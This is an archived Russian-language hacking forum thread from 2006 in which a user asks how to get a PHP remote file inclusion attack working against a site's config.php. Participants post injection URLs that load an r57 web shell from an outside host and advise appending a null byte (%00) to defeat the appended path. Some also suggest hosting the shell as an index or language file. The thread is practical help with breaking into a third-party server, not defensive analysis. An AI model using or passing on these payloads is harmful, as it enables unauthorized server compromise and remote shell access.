Просмотр полной версии : KaK ZaNUll it URL
netadmin
11.09.2006, 00:48
mne ochen interesna nu kak zanulit toist ignoriravat ili zdelat tak shto
naprimer
www.chtota.ru/fail.php?fail=http://fail.ru/fail.php?----a zdes kod shtobi posli etava ne rabotal kod nekakoi
v smisle kagda ia pishu
naprimer
http://www.zzzzzzz.com/dddd/config.php?fpath=http://HackScripts.by.ru/r57shelll.php
sait atvichaet:
Warning: Failed opening 'http://HackScripts.by.ru/r57shell.php./language/lang_slovenian.php' for inclusion (include_path='.;c:\php4\pear') in d:\server\radiobakla\puma\config.php on line 95
poniali ?
prashu abisnite
Вот руководство (http://www.bugtraq.ru/forum/faq/general/smart-questions.html)
зы В следующий раз юзай вот это (http://ourworld.compuserve.com/homepages/PaulGor/screen_r.htm)
netadmin
11.09.2006, 00:56
a ti ne mojes atvichat na vapros mne ne nada vso eta
chto mne nada ia uje napisal esli ne znaish vapshe ne pishi
14 n3 p0n14| (h70 71 mn3 n4p154| d4j3
netadmin
11.09.2006, 01:08
a ti v Md5 pishesh da zashifrovanaa :D
Я расшифровал ;)
Попробуй так.
http://www.zzzzzzz.com/dddd/config.php?fpath=http://HackScripts.by.ru/r57shelll.php%00
[hidden]
11.09.2006, 02:42
2netadmin: tclover выражается на языке элитных хакеров=) "14 n3 p0n14| (h70 71 mn3 n4p154| d4j3" в переводе значит "Я не понял что ты мне написал даже"
Этот язык тебе придеЦЦа выучить в первую очередь, одепт!
Оффтоп. Транслитщики, очень вас прошу, юзайте translit.ru!
А мне понравилось, как ты засветил сайт =)
Короче если проследить вывод на экран, то можно заметить что он подставляет точку, после вводимого значения fpath... Тоесть например вводим http://yyy.ru, то он подставляет как http://yyy.ru./language/lang_slovenian.php
Думаю понял... Вот еслиб не было точки, тогда можно было бы замутить шелл... Например создать файл lang_slovenian.php с содержанием шелла, поместить в папку language и залить на сайт...
А потом просто ввести сайт, куда залили language...
Неохота напрягать глаза, читая транслит, но вроде суть проблемы ясна.
Попробуй подставить в параметр такое:
http://xaxa.ru%00
А на сайте хаха.ру в индекс суем шелл...
Я же помойму все объяснил, что инколуд не пройдет...
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot